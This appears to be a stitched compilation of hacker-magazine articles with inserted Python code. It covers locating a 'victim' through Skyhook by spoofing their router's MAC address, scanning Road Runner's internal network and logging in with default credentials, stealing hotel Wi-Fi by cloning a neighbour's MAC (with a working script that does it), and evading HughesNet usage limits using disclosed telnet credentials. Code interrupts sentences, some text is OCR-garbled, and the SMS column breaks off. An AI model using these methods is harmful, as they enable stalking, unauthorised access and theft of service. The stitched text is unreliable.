This article is for educational purposes only. Check local laws before attempting anything. The author holds no responsibility for the use or misuse of this information.

General Information

As you may know, there is a new feature included in the Google Maps 1.1.3 update for the Apple iPhone and iPod Touch: the "Locate Me" feature. The new feature is provided by another company called Skyhook Wireless (http://www.skyhookwireless.com/). Skyhook's system is named WPS, for Wireless Positioning System, and locates users by knowing the location of their wireless access points. [...] performs their location features in a unique way because WPS requires knowledge of the specific geographical location of individual [...] and locate access points, and they then append this information to a large reference database.

The problem with the system, other than knowing someone has driven by your house or business and added your AP's information to a large database, is that a third party can then locate you with only your MAC address. I recently emailed Skyhook and asked if there is a way for people to [...] database besides unplugging the access point. This article will provide evidence contradicting both answers provided by Skyhook. It will also explain how someone with malicious intent could possibly discover your location.

Requirements

To run these scripts, you'll need a Linux computer with an ethernet connection and a wireless card capable of master mode; an iPhone, iPod Touch, or any other mobile device with the "locate me" feature; the MAC address of your victim; and an isolated area where no access points have been located and added to Skyhook's reference database.

Scripts

There are two scripts in this system. skyhack.sh will create a bridge between the ethernet and wireless card to create an AP environment. You can also use two wireless cards, but the AP broadcasting must be unmarked by Skyhook, which would require editing the scripts. delbr0.sh destroys the bridge, which returns your computer to normal.

Step 1: Gaining the MAC address of a victim

The process of acquiring a MAC address is beyond the scope of this article, but I will provide some general ideas as to how to do it. Wireless router packaging often displays the MAC address on the outside of the box, so sales personnel at an electronics store could easily write down the MAC address and keep that information until the product is sold. This is fairly useless, because the MAC address can be cloned during the setup of a wireless router, which would then change the address, rendering the original information obsolete. Another way to acquire a MAC address is via social engineering. This is accomplished by conning an individual into divulging their MAC address. Google is another source that can be used to obtain MAC addresses. Some people post their MAC addresses while seeking help in a forum to solve a problem. Gaining access to a computer through a Trojan horse and running the command "arp -a" [...]

Step 2: Setting up your computer

The basic idea is to make your computer into an AP that spoofs the victim's MAC address. The way we do this is to bridge the ethernet cable and wireless card. The wireless card will then act as the access point of the spoofed victim. To run the bridging script, run this command from the console: ./skyhack.sh 00:00:00:00:00:00. You need to change the MAC address to the twelve-character MAC address of the victim. Your connection will then be bridged, and the router's DHCP server will hand out an IP address to your mobile device when connected.

Step 3: Finding the approximate location

When you go to your mobile device, you should see the SSID "skyhack." Connect to this "skyhack" network. To ensure that your connection is working properly, check that your IP address is not in the 169.254.0.0 address block. Your web browser should then be used to load a website to guarantee that you are receiving internet traffic. If this works, you are now ready to connect to Google Maps and use the "locate me" feature. Make certain there are no other APs around; if there are, be sure that they are not in Skyhook's database, as they can affect your results. By using the "locate me" feature, you should now be able to see the victim's approximate location within a 100m-200m diameter.

Step 4: Locating victims' exact locations

Use Google Maps to give you driving directions to the approximate location given. To return your computer to normal, run ./delbr0.sh. This removes the bridge between your ethernet and your wireless card. It also returns your wireless card to managed or default mode. Now, drive to the approximate location, and scan the local area with your laptop or mobile device for the specific MAC address in question until the location is pinpointed.

Prevention

To prevent these types of security breaches, keep your software patches up-to-date and use virus and malware scanners to prevent intrusion by others who may then acquire the MAC address of your router. Also be wary of technical helpers over the phone or over the Internet who ask for your MAC address. A more definite way to prevent intrusion is to use the "Clone MAC" feature that can be found on most router configuration pages. This is primarily used to prevent the ISP from blocking internet access to your newly acquired hardware, making it so that only your PC can access the internet. This tool can also be used to change the MAC address so that it will point intruders to nowhere or will point them to someplace completely different. Always check that the newly changed MAC address is not similar to a neighbor's. With Skyhook claiming that it is not possible to remove single APs from their database, this is the best method, as long as you change the MAC often.

This method of locating has been tested with access points around my local area and also with a friend who lives almost 8000 km away. Please note that this "attack" is only as accurate as Skyhook's database. As a side note, these types of attacks could be used to tell friends your home address. Instead of telling them that the address is "2600 Robert Street," you could say, "I am living at 00:00:00:00:00:00."

Notes

The scripts provided in this article will not work out of the box with any wireless card or ethernet adapter unless the interfaces are named ath0, wifi0, and eth0. In most other cases, a simple change from ath0 to eth1 or wlan0 is all that is needed. Using different routers will also require different IP ranges. For example, Dlink routers would use 192.168.0.5 instead of 192.168.1.5.
Exploring Road Runner's Internal Network
by Tim

Most ISPs require you to have a modem of some sort. For broadband cable, this is usually a DOCSIS (Data Over Cable Service Interface Specifications) compatible device, version 1.0, 1.1, 2.0, or 3.0, depending on your ISP's needs. This device is essential to cable internet as it isolates and uses the various frequencies on the cable line which have been reserved for internet service. All of this information is determined by your ISP and is delivered to the cable modem via tftp from some server on your ISP's non-public network. Your cable modem has a MAC address like any other network device, and it is usually this that the ISP uses to authenticate you to the network. The CMTS (Cable Modem Termination System) is where the transition between cable and fiber happens, for those that are interested. At any rate, once your device is determined to be legitimate (again, the method is determined by the ISP, but is most likely the MAC address) you are leased a public IP address. There is also an internal IP address granted to the modem, and it usually resides somewhere in the 10.x private subnet. This address should never be accessible either from your own computer or by anyone else that isn't correctly authenticated on the network. This is to prevent various horrible things from happening, such as the use of one of the many in-band configuration methods for routers and switches that reside on the networks. Most devices decide who should be able to access the device remotely only by seeing which network they reside on. If you access the 10.x side of the device, the odds are good that you'll be allowed access at least at the same level as the ISP. Simple enough. Now, once your device is given the correct network configuration, it then forwards those settings onto your computer. If you are not using a router or some middle-man appliance, then your computer will inherit the TCP/IP configuration, allowing you to access the internet at large.

The cable modem is essentially doing very simple routing for your computer. It is simply taking everything given to it and pushing it through the other side in accordance with the ISP's settings. This is how it was intended to be. The cable company can terminate your connection by sending a series of commands to the device. It can similarly throttle your connection, do troubleshooting, and so on. They do this either by using proprietary tools such as Orion, which has some phenomenal CMTS tools, or by using in-house tools, usually PHP, ASP, or Perl scripts running on some machine that manages the network. (See the resources at the end of this article for some interesting sites on the Road Runner network.) From there, they can do all sorts of stuff, but the important thing to remember is that they are not using your public IP address to do this; they are using the private IP address given to your modem. This is where my story begins.

I was sitting in my office, configuring my router to support the addition of a couple more subnets in the 10.0.0.0/24 range. As I was doing this, I decided that the easiest way to test for connectivity among the various subnets was to simply allow all traffic on the 10.0.0.0/8 network to pass to any of the other subnets. So, I set all this up and let some ICMP traffic fly across the wires. This is where it got interesting.

I typed an IP address incorrectly. To be specific, I typed 10.0.0.10 and pressed enter. Knowing that this IP address would not be found on my network I went to Ctrl+C the command. What did I see appear on my console? "Reply from 10.0.0.10: bytes=32 time=76ms TTL=128." My first thought was that someone had penetrated my network and established an entire subnet without me noticing. Then I saw the latency and decided to do a traceroute. Sure enough, the trace passed through my router, through the ISP-provided modem, and over the Road Runner network, eventually coming to a stop at some poor soul's Ambit Cable Modem. Admittedly, I was very curious, so I ran
some simple nmap commands and discovered that this device was listening on port 80. So, I loaded Firefox and hit the device with HTTP. Sure enough, I saw the cable modem's management screen. Being the concerned citizen that I am, I tested the login to make sure the defaults had been changed. Much to my surprise, I could log in and get full viewing and configuration access with username and password "user." I then had admin access to someone's cable modem, complete with an internal IP address range on Road Runner's network, the public IP address, the MAC address, and everything else needed to clone their cable modem and steal their service. From the screen which came up, you can restart the device, reset it to the factory defaults, or do pretty much anything you want. My mind boggles at the concept. And this is just 10 addresses into a 16 million host subnet. I immediately powered up nmap with OS fingerprinting and version scanning with the target network of 10.0.0.0/8. I watched as the log file grew from 1k to 10k to 100k to 1000k. After a couple of hours, I had a 5MB file, full of cable modems running HTTP, SSH, telnet, and various other services, all of them using default logins and passwords. Most of them are running vulnerable versions of SSH, and all of them will fall back to SSH1, which means that any passwords that may be in place protecting the shell access are useless.

I suddenly realized that Road Runner might notice all of the scanning that I was doing, so I called up Road Runner tech support and asked to speak to someone in the security department. They put me on hold, and I listened to crappy music for about ten minutes before someone finally picked up. We will call him Bill.

"Hello, thank you for calling Road Runner technical support. My name is Bill, how can I help you?"

"Hi, Bill. My name is Tim. I'm just calling to report some strange behavior on your network. It seems that I am able to see some of your internal IP addresses. I can access your entire class A subnet as if it were public."

"Oh... hold on a minute. I have to make a call."

I was then put on hold for about twenty minutes. Eventually Bill returned, with an edge of concern in his voice.

"Can you give me some more information about this? What addresses are you seeing? What do you think is allowing you to do this?"

"Well, any IP address on the Road Runner network that starts with 10 is visible to me. There don't seem to be any restrictive measures in place or anything, Bill. As for how this has been happening, I'm not sure."

"Okay, do you see any other private IP addresses, anything like 192?"

"Doesn't seem like it, Bill, but I haven't really looked either."

"How are you seeing these IP addresses? Are you using a packet sniffer or something?"

At this point, I realized that he was very concerned and that he was fishing for information. I told the truth, as I don't want to go to jail for terrorism or some other equally absurd reason. (Hooray for abusive and unconstitutional laws!)

"I'm just using nmap to scan the subnet, no packet sniffers or anything. So, yeah, I'm actually very concerned about this. If I can see these internal IP addresses, it means that I can sniff traffic off the network as well, Bill. I don't like that. If I found this by mistake, someone out there will certainly find it as well. I mean, if I were malicious, I could cause some serious damage. These devices have default admin logins. Oh, and the guy at 10.0.0.10 is having network issues."

"Really?" He chuckled nervously. "Well, hold on a minute. I have to make a call."

I waited on hold again, this time for only a couple of minutes.

"Alright, the security specialists say that this is normal for the network. Since you're a part of the network, you should be able to see the other machines, so it's okay. You're on a business account and, since you have a static IP, you are able to see some things that most of our customers can not. I'll make some notes on your account so that it's clear that you mentioned this to us and were concerned. You might get a call from the Road Runner security department some time in the future. Is there anything else?"

The conversation ended with the standard scripted closing, and I hung up the phone.

Normal operational behavior? An entire internal IP address range available publicly? I could see not just an entire subnet, but the entire 10.x network, the entire Road Runner network. I decided to test Bill's theory about the business connection. I SSHed into my Linux box at home and issued a ping to 10.0.0.10. Sure enough, it responded. So, everyone on the Road Runner network can simply use this private IP range to access network equipment. I quickly loaded up nmap and continued the scan.

At this point in time, I had found several thousand modems, nearly all of them running
webservers, many of them also running SSH and telnet. I also found several cable modems acting as routers. If someone were to log into one of those devices, it wouldn't be hard to set up forwards into the NATed network or to forward all their traffic through a tunnel to some other PC. The possibilities then would be nearly limitless: hijacking VoIP service by cloning their hardware, stealing internet service by cloning the MAC address, changing settings, or redirecting the location of the default DOCSIS servers, among other things. As far as ISP-level equipment goes, Road Runner's DHCP servers, DNS servers, and network monitoring services are all available for scanning. Worse, nmap's version reporting option (-sV) shows version numbers for the services running. Many of these are reported correctly, and several of them are vulnerable to very well-known exploits. For instance, on one particular server the SSH daemon is set to roll back to SSH1 if the client doesn't support SSH2. Aside from all of that, a quick scan of the log file reveals the type of IDS they're using, the type of network monitoring software they're using, strange and unneeded third party applications such as screencast, and other pieces of information, all freely available. Honestly, I don't imagine that it would take a skilled hacker more than an hour or two to successfully compromise the systems. The servers are pretty homogeneous, apparently consisting mainly of Linux servers running essentially the same applications, so the odds are good that if you can compromise one system, then you can take the rest as well. Also, each system seems to be a central IDS reporting center, most likely for whatever section of the network it controls, and syslog information is forwarded to those machines.
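The two conditions above, a private management address that answers from another customer's side of the network and an SSH daemon that will roll back to protocol 1, are both things a network owner can check on their own equipment. The following is an added example, not code from the article: it parses SSH identification strings as defined in RFC 4253 (a server that speaks both protocol versions announces "1.99") and flags RFC 1918 addresses that answer from outside the auditor's own site prefix. The site prefix and the (address, banner) records are constructed.

```python
"""Triage of SSH identification strings and private-address reachability.

Added example, not from the article. Input is a list of (address, banner)
pairs that a network owner collected from their own equipment; the site
prefix and the sample records below are constructed.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion SP comments CR LF".
# "1.99" means the server speaks both protocol 1 and 2 (the roll-back the
# article describes); any other "1.x" means protocol 1 only; "2.0" is v2 only.
_BANNER_RE = re.compile(
    r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comment>.*))?$"
)

# RFC 1918 space that a provider should never expose across customer boundaries.
PRIVATE_NETS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

OWN_SITE = "10.10.0.0/16"  # constructed: the auditor's own private prefix

# Constructed records: (address that answered, first line it sent on port 22).
SAMPLE_RECORDS = [
    ("10.0.0.10", "SSH-1.99-OpenSSH_3.9p1"),        # provider-side modem, v1 fallback
    ("10.0.0.11", "SSH-1.5-Cisco-1.25"),             # protocol 1 only
    ("10.10.1.5", "SSH-2.0-OpenSSH_7.4 Debian-10"),  # the auditor's own router
    ("10.0.2.30", "HTTP/1.0 200 OK"),                # answered, but not SSH
]


@dataclass
class Finding:
    address: str
    severity: str
    reason: str


def parse_ssh_banner(banner: str) -> dict:
    """Split an SSH identification string into its RFC 4253 parts."""
    m = _BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError(f"not an SSH identification string: {banner!r}")
    proto = m.group("proto")
    return {
        "protocol": proto,
        "software": m.group("software"),
        "comment": m.group("comment"),
        "accepts_ssh1": proto.startswith("1."),  # 1.x only, or 1.99 dual-protocol
        "ssh1_only": proto.startswith("1.") and proto != "1.99",
    }


def is_foreign_private(address: str, own_site: str) -> bool:
    """True when address is RFC 1918 space that lies outside the caller's own site."""
    addr = ipaddress.ip_address(address)
    in_private = any(addr in net for net in PRIVATE_NETS)
    return in_private and addr not in ipaddress.ip_network(own_site)


def triage(records, own_site: str = OWN_SITE) -> list[Finding]:
    """Report foreign private addresses that answered, then SSH protocol exposure."""
    findings: list[Finding] = []
    for address, banner in records:
        if is_foreign_private(address, own_site):
            findings.append(Finding(address, "high",
                                    "private address answering from outside own site"))
        try:
            info = parse_ssh_banner(banner)
        except ValueError:
            continue  # not SSH; nothing more to say about this record
        if info["ssh1_only"]:
            findings.append(Finding(address, "high",
                                    f"SSH protocol 1 only ({info['software']})"))
        elif info["accepts_ssh1"]:
            findings.append(Finding(address, "medium",
                                    f"falls back to SSH protocol 1 ({info['software']})"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f.severity:6} {f.address:12} {f.reason}")
```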
The information that could be gleaned from the log files alone would be worth its weight in gold. Of the 25,000 or so devices that showed up, about 100 of them seemed to be ISP servers. I stopped scanning after about 12 hours because I felt like I had seen enough, but anyone who were to scan the entire 10.x subnet would undoubtedly discover much more than I have. Needless to say, the potential for abuse here is tremendous, and it's shocking that this kind of network behavior was ever engineered to begin with. Under normal circumstances, their routers and firewalls should filter public requests for private IPs, but I guess this isn't being done. I guess it's true what they say about corporate networks: hard on the outside, gooey on the inside.

One final note: There are interesting sites at tools.location.rr.com, where location is your geographical region, usually pretty easy to figure out. For example, the Tampa, Florida area is http://tools.tampabay.rr.com. The login and password have recently changed, but these sites contain all the information needed to hijack someone's account or to change most, if not all, of the services attached to the account. Pretty slick stuff.

Hacking Wireless Networks with Windows
by Carbide

First, the necessary disclaimer: gaining unauthorized access to wireless networks, especially when someone wants you to pay, is probably illegal. This article is provided for information only.

I was recently on a business trip, and I took the company-provided Windows laptop with me. The hotel I was staying in had Wayport wireless access [1] for a fee. Opening up Firefox took me to the page that explains the pricing and service. The hotel I was in happened to have only unlimited plans, which I'll explain later. My friend once told me that he had read in 2600 a way to gain access to wireless networks by MAC address spoofing in Linux. He basically described that you find other computers on the wireless network, then find their MAC addresses, then change your MAC address to match theirs. Once this is done, the wireless router routes every other packet to your computer. The way it was described, the wireless router thinks both computers are one computer because they have the same hardware address.

Not having Linux with me at the time, I made sure I had two very important programs: Kaboodle and Technitium MAC address changer. First, I connected to the wireless access point of interest and opened up Firefox to ensure that the correct page was displayed. Second, I opened up Kaboodle and waited for every computer on the network to be scanned. This may take a while if the network is really busy. Then, the computers were displayed; some are shown as computer names like NANCY, others as IP addresses. Double clicking on one of them shows the computer's MAC address:

[Screenshot: Kaboodle showing the selected computer's MAC address]

The next step is to change your MAC address to the one that is displayed. There are several ways to do this in Windows. One way that I'm familiar with is to edit the registry to change the address, but I prefer the Technitium MAC address changer for frequent changes. Open up this program, and change the MAC address to the one that is displayed by Kaboodle:

[Screenshot: Technitium MAC Address Changer with the new address entered]

The wireless card should be disabled and then re-enabled, and then it should reconnect to the network of interest. Navigate to your homepage and it should display. Some problems that might be encountered are slow page load times, frequent disconnects and reconnects to the access point, and a complete inability to access the AP at all. I encountered slow page load times. This might be attributed to both computers trying to access a lot of information at one time or downloading or uploading large amounts of data. If this happens, changing to a different MAC address might be useful. The second problem might be the router trying to defeat this method, detecting two identical MAC addresses, and not allowing either to connect. The third problem might be that the router has detected one MAC address first and will not allow an identical one to connect because it has already associated.

Several moral and ethical problems might be considered. For example, if this is not an unlimited plan, then each byte might cost the customer money. Common courtesy would dictate that you make sure you're using an unlimited plan. Also, if the user suspects that activity has been going on when they were not using the service, it might raise some questions. Another potential problem would arise if the customer gets randomly kicked off; they might call technical support to investigate, which could further complicate matters. The last moral dilemma is charging for wireless access in the first place, which should put people at unease, but, surprisingly, doesn't. One problem with this is charging for a substandard service when other services are available that people would have no objection to paying for, such as ethernet and fiber optic connections. The other problem with charging is that offering free wireless access attracts customers to whatever service you are offering, whether it's staying at a hotel or getting a cup of coffee.
I apologize for the d i gression and for any d i sagreei n g l etters that might fol l ow. References 1 http://www . wayport . n et/ 2 http://www.kaboodl e.org/ l http ://tmac . t ec hnitium . c o m/ -tmac/ Thanks: Droid for telling me about this method and the author of the 2600 article about it. Summer 2008 ------------------- Page 1 1
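The registry route the author mentions can be scripted rather than clicked through. The following Python is an added example for this edition, not the author's procedure and not code from Kaboodle or Technitium: it reads neighbours from the local ARP cache (so it only sees hosts you have already exchanged frames with, unlike Kaboodle's active scan), reformats a chosen address the way the NetworkAddress registry value expects it, and issues the disable/enable pair through netsh. The arp -a sample, the adapter subkey index 0007, and the interface name are assumptions for illustration.

```python
# Added example: clone a neighbour's MAC on Windows via the NetworkAddress
# registry value. Not the article's tools; written for this edition.
import re
import subprocess
import sys

# Constructed sample of `arp -a` output from an English-language Windows box.
SAMPLE_ARP_OUTPUT = """
Interface: 10.1.2.57 --- 0x2
  Internet Address      Physical Address      Type
  10.1.2.1              00-1b-2f-aa-bb-cc     dynamic
  10.1.2.14             00-13-02-1a-5b-ef     dynamic
  10.1.2.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})\s+(\w+)",
    re.MULTILINE)

# Network adapter class key; every adapter has a numbered subkey (0001, 0002, ...).
ADAPTER_CLASS = (r"SYSTEM\CurrentControlSet\Control\Class"
                 r"\{4D36E972-E325-11CE-BFC1-08002BE10318}")


def parse_arp(text):
    """(ip, mac) for dynamically learned unicast neighbours; skips broadcast/multicast."""
    hosts = []
    for ip, mac, kind in ARP_LINE.findall(text):
        if kind.lower() != "dynamic" or int(mac[:2], 16) & 1:
            continue
        hosts.append((ip, mac.lower()))
    return hosts


def to_registry_form(mac):
    """NetworkAddress wants 12 hex digits with no separators, e.g. 0013021A5BEF."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError("not a 48-bit MAC address: %r" % (mac,))
    return digits


def set_network_address(adapter_index, mac):
    """Write NetworkAddress under the adapter's subkey (assumed index, e.g. '0007').
    Windows only; needs an elevated prompt. The adapter must be bounced afterwards."""
    import winreg  # stdlib on Windows; imported here so the rest runs anywhere
    path = ADAPTER_CLASS + "\\" + adapter_index
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path, 0, winreg.KEY_SET_VALUE) as k:
        winreg.SetValueEx(k, "NetworkAddress", 0, winreg.REG_SZ, to_registry_form(mac))


def bounce_commands(interface_name):
    """The disable/enable pair the article describes, as netsh invocations."""
    return [["netsh", "interface", "set", "interface", interface_name, "admin=disable"],
            ["netsh", "interface", "set", "interface", interface_name, "admin=enable"]]


def current_arp_table():
    """Live table on Windows; the constructed sample elsewhere."""
    if sys.platform != "win32":
        return SAMPLE_ARP_OUTPUT
    return subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout


if __name__ == "__main__":
    hosts = parse_arp(current_arp_table())
    for ip, mac in hosts:
        print("%-16s %s  NetworkAddress=%s" % (ip, mac, to_registry_form(mac)))
    # Full sequence for the second neighbour (assumed adapter index and interface name):
    if sys.platform == "win32" and len(hosts) > 1:
        set_network_address("0007", hosts[1][1])
        for cmd in bounce_commands("Wireless Network Connection"):
            subprocess.run(cmd, check=True)
```

Run it from an elevated prompt on the laptop and then confirm with ipconfig /all that the physical address really changed; some wireless drivers quietly ignore a NetworkAddress whose first octet lacks the locally administered bit (second hex digit 2, 6, A or E), which is one reason the registry method is less convenient than the tool. With the same MAC you will usually also be handed the same DHCP lease as the other client, which is a likely cause of the slow pages and disconnects described above.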
The HughesNet FAP
by ntbnnt

I use satellite Internet, which is great for web browsing, IRC, IM, e-mail, and the like. But it offers absolutely no convenience whatsoever for downloading music, listening to internet radio, or downloading my favorite Linux distro. You see, HughesNet has a particularly restrictive Fair Access Policy (FAP). Now, I understand perfectly why a FAP is needed; however, it seriously limits many of the more obvious and useful applications of high-bandwidth Internet. Having the hacker's perspective, I questioned if it were possible to reset my Internet usage statistics, so that I'd be able to take the 2.5 hours of non-stop HTTP communication that it takes to download an .iso of Debian without having to wait 24 hours after each hundred megabytes.

The equipment for a HughesNet connection is a satellite dish, its radio, and a receiver, or modem if you will. The modem is a basic VxWorks-based router with only one port and the equipment and software to interpret the satellite signal. You can telnet into this router by connecting to 192.168.0.1:23 and entering the username brighton and the password swordfish. Anyone with experience hacking VxWorks equipment should find a new toy instantly with that information.

But, onward to the FAP issue. There is a separate telnet daemon running on the HughesNet modem. It is listening for the free-minded to call upon its power at 192.168.0.1:1953, and Hughes made it easy for us, since we can access this menu without any kind of login. Basically, this is the CLI of what you get by visiting http://192.168.0.1, but it provides some much more useful functions. Entering ? at the command prompt will yield all the info we will need.

The HughesNet FAP is enforced by tracking the bandwidth used by each Site ID. If you've never done so before, go to System Info to see this. Basically, it serves as authentication that your modem is commissioned for service. If you have no Site ID, access to the HughesNet network will not be granted.

Now, basically the goal is to reset all of the information stored about you at the HughesNet NOC, so your FAP status is reset back to nil. That will allow you to finish the download of Debian, RedHat, or whatever you prefer. So, we will need the help of tech support. This is fine, because tech support is your friend. Reconnect to your router and enter the command rd. This is going to force your modem into a state of being decommissioned, which will require it to be recommissioned with the help of tech support. Go ahead and call 1-866-347-3292. Give them all the info they need; be honest. The agent will not check your FAP status-it's simply not in the script. He will tell you to go to http://192.168.0.1/fs/registration/setup.html and click "Re-Register." Continue through the prompts until the modem reboots. After it does so, let it sit, watch the status at http://192.168.0.1, and let it update. When it's done updating, go ahead and check the FAP status. It should now say "NO." That means sweet, unmetered freedom. Smile and watch as your connection goes from 2.2 kb/s to 200.2 kb/s, and smile bigger with that nice fat download sitting in your download folder. Redo this as needed, but remember to call tech support every few times that you need to do it; that way Hughes will see that there are issues with your service and that you aren't decommissioning your modem for fun.

Shouts to h3xis, who taught me about firmware, showed me how to hack Tomato, and introduced me to 2600.
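A practitioner's first question about a box like this is which services answer without credentials. The following Python is an added example for this edition, not the author's code: it connects to a port, sends the ? the article uses to get the menu, reads back whatever the service offers, and reports whether a login prompt appeared. The address and ports are the ones the article gives; the menu text used by fake_service is constructed for offline runs and is not the modem's actual output.

```python
# Added example: check whether a LAN device answers a management port without a
# login. Not the article's code; host/ports are the ones it reports for the
# HughesNet modem, and the fake replies used for offline runs are constructed.
import socket
import threading

LOGIN_PROMPTS = (b"login:", b"username:", b"password:")


def probe(host, port, payload=b"?\r\n", timeout=3.0, max_bytes=4096):
    """Connect, send `payload`, read what comes back.
    Returns (reachable, banner, asked_for_login)."""
    chunks, total = [], 0
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(payload)
            while total < max_bytes:
                try:
                    data = s.recv(1024)
                except socket.timeout:
                    break                 # service went quiet; keep what we have
                if not data:
                    break                 # peer closed the connection
                chunks.append(data)
                total += len(data)
    except OSError:
        return (False, b"", False)        # refused, filtered, or unroutable
    banner = b"".join(chunks)
    asked = any(p in banner.lower() for p in LOGIN_PROMPTS)
    return (True, banner, asked)


def classify(result):
    """Turn a probe() tuple into the one-line verdict a report would carry."""
    reachable, banner, asked = result
    if not reachable:
        return "closed or filtered"
    if asked:
        return "login required"
    return "open, no login prompt" if banner else "open, silent"


def fake_service(reply):
    """Loopback stand-in for offline runs: answers one connection with `reply`
    (constructed text, not the modem's). Returns the ephemeral port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.recv(64)                     # wait for the probe's "?" before answering
        conn.sendall(reply)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for port in (23, 1953):               # the two ports the article reports
        print(port, classify(probe("192.168.0.1", port)))
    demo = fake_service(b"Main Menu\r\n 1) System Info\r\n 2) Reset\r\n> ")
    print("demo", classify(probe("127.0.0.1", demo)))
```

Run on the satellite LAN it prints one verdict per port. A "login required" on 23 together with "open, no login prompt" on 1953 is the situation the article describes; any management menu reachable on an unauthenticated port deserves to be firewalled from everything but the host you administer it from.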
Telecom Informer

Hello, and greetings from the Central Office! After an unusually cold and rainy winter here in the Pacific Northwest, summer is in full swing. With so little good weather in this part of the world, people head outdoors and make the most of it - even with gasoline hovering near $5 per gallon. For many young people, this means it's time for noisy outdoor concerts, which I'm told are even louder than our diesel backup generator here at the Central Office.

At a huge music festival with sound systems approaching the decibel level of a 737 taking off, how do you find your friends? Increasingly, text messages are the solution. You may not think about it much when you're sending "HEY CRACK DAWG WHERE U @" to your friend, but sending and receiving small text messages is incredibly complex - in fact, much more complicated than email. Making matters worse, there are multiple versions of SMS, and multiple technologies involved in mobile phone systems (for example, CDMA IS-95, CDMA2000, GSM CSD, and GSM GPRS). For this article, I'll focus on GSM networks, which are operated by AT&T and T-Mobile (along with some smaller regional carriers such as Edge Wireless) in the U.S.

Text messages are governed by the Short Message Service (SMS) standard. This is currently defined as part of the European Telecommunications Standards Institute (ETSI) GSM 03.40 standard, with the character sets defined in its companion GSM 03.38. It incorporates, by reference, the MAP part of the Signaling System 7 (SS7) protocol. The specification allows for 140-byte messages. In North America, this translates to 160 characters because the default character set is a 7-bit alphabet (the GSM 03.38 default alphabet, which resembles but is not identical to 7-bit ASCII). In alphabets that need Unicode (such as Arabic, Chinese, or Cyrillic), where characters are sent as UCS-2 at two bytes apiece, SMS messages can only be 70 characters in length. Whichever alphabet you use, larger messages are generally split apart to be delivered (and billed) as multiple text messages.
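As an added example for this edition (not code from the column or from any carrier), the following Python packs text in the GSM 03.38 7-bit default alphabet, which is the encoding behind the 160-character figure, falls back to UCS-2 for text outside it, and turns a message into the segment count a carrier would bill. The per-segment limits of 153 and 67 are the 160 and 70 figures less the six-byte concatenation header that splitting needs; the packing order (septets least-significant bit first) is the one GSM 03.38 specifies.

```python
# Added example: GSM 7-bit packing and SMS segment counting.
# Not code from the column; the character table is the GSM 03.38 default alphabet.

GSM_BASIC = (
    "@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà"
)
# Extension table: each of these is sent as ESC (0x1B) followed by the code below.
GSM_EXT = {"\f": 0x0A, "^": 0x14, "{": 0x28, "}": 0x29, "\\": 0x2F,
           "[": 0x3C, "~": 0x3D, "]": 0x3E, "|": 0x40, "€": 0x65}
ESC = 0x1B
assert len(GSM_BASIC) == 128

# Capacity of the 140-byte user-data field, single and concatenated segments.
GSM7_SINGLE, GSM7_CONCAT = 160, 153    # 140*8/7 = 160 septets; 6-byte header costs 7
UCS2_SINGLE, UCS2_CONCAT = 70, 67      # 140/2 = 70 code units; 6-byte header costs 3


def gsm7_septets(text):
    """Map text to 7-bit codes, or None if a character has no GSM-7 encoding.
    Extension characters (e.g. the euro sign) cost two septets."""
    out = []
    for ch in text:
        if ch in GSM_EXT:
            out.extend((ESC, GSM_EXT[ch]))
            continue
        i = GSM_BASIC.find(ch)
        if i < 0 or i == ESC:          # unknown, or a raw ESC byte in the input
            return None
        out.append(i)
    return out


def pack7(septets):
    """Pack septets into octets, least-significant bit first (GSM 03.38 6.1.2.1.1)."""
    out, acc, nbits = bytearray(), 0, 0
    for s in septets:
        acc |= (s & 0x7F) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    if nbits:                          # trailing partial octet, zero-padded
        out.append(acc & 0xFF)
    return bytes(out)


def unpack7(data, count):
    """Inverse of pack7: recover `count` septets from packed octets."""
    acc = int.from_bytes(data, "little")
    return [(acc >> (7 * i)) & 0x7F for i in range(count)]


def segments(text):
    """Return (encoding, segment count) for `text`, the way a handset would bill it.
    Counting only; a real segmenter also keeps ESC+char pairs inside one segment."""
    septets = gsm7_septets(text)
    if septets is not None:
        n = len(septets)
        return ("GSM-7", 1 if n <= GSM7_SINGLE else -(-n // GSM7_CONCAT))
    n = len(text.encode("utf-16-be")) // 2     # UCS-2 code units (assumes BMP text)
    return ("UCS-2", 1 if n <= UCS2_SINGLE else -(-n // UCS2_CONCAT))


if __name__ == "__main__":
    for msg in ("hellohello", "5€", "a" * 161, "Привет"):
        print(repr(msg[:12]), segments(msg))
    print(pack7(gsm7_septets("hellohello")).hex())
```

pack7 on "hellohello" yields the nine bytes e8329bfd4697d9ec37, a commonly published test vector for this packing: ten 7-bit characters fit in nine octets, which is the whole reason 140 bytes carry 160 characters. The segment counter is for billing estimates; a message that a handset must split is what the concatenation header below is for.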
However, because additional metadata is required to stitch the pieces back together, the size of each piece is reduced by six bytes (seven characters in the 7-bit alphabet, leaving 153 per piece; three UCS-2 characters, leaving 67).

To understand how an SMS message is delivered, it's important to first understand a little about how GSM switching works. So, here's a crash course.

HLR

